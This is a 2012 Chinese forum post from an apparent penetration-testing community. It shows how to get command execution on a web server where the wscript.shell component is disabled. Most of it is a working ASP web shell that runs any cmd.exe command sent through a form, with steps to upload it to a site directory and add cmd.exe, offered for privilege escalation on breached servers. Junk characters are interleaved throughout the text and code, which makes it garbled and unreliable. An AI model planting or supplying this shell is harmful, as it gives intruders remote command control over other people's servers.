中国网络渗透测试联盟

标题: wscript.shell删除解决办法 [打印本页]
作者: admin    时间: 2012-9-15 14:36
标题: wscript.shell删除解决办法
可能有很多人,看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。
0 J* S5 F) Y- B2 a! z  o2 i一般当闭上面组件时,你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。
( J3 I+ Q: K9 N# \; M% k要想让运行命令可以试试这种方法,成功率为五五之数。/ M+ z9 {# k# l
把下面代码复制:0 }  h( a, L* s
<object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
- Y  E' D& f2 Q, l2 J; m' O# f3 N. ]<%if err then%>
. i( ^! p) U/ Y( R2 m  j( o, u<object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>1 X8 ~% d$ g- |6 S! r
<%6 s, k8 ?' r7 J$ {5 [
end if5 g/ u* I( t! M
response.write("<textarea readonly cols=80 rows=20>")5 [% r3 d1 t- S: z7 t' A
On Error Resume Next, x+ f' N- V' X- C* o+ C3 u
response.write oScriptlhn.exec("cmd.exe /c" & request("c")).stdout.readall
% b( J0 Q* b- C5 Vresponse.write("</textarea>")) \9 c: D2 o" K7 S' _: h6 H3 }/ J
response.write("<form method='post'>")
; [5 L% Q# G" iresponse.write("<input type=text name='c' size=60><br>")
( v! c8 x2 o0 `4 ]6 M2 jresponse.write("<input type=submit value='执行'></form>")  U" [/ p# p; O! s, [
%>
* D9 v  [+ S# o) A/ L* N: Y' H$ l& N" ^6 S, U$ l6 U- }
保存为一个asp文件,然后传到网站目录上去& p8 ?7 M9 Z* u; L. U1 b
运行的时候可能会出现两个问题,第一是运行了为什么运行不了命令,这个你可以试着再上传个cmd.exe然后把路径写入上面代码。) T# Q+ h5 p) Y5 T6 n  u6 n
我用此成功运行过cacls命令。
/ s5 t5 t! Y0 [# @& [
$ `! x: s; s* `第二那就是运行时出错,可能限制某些代码执行



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2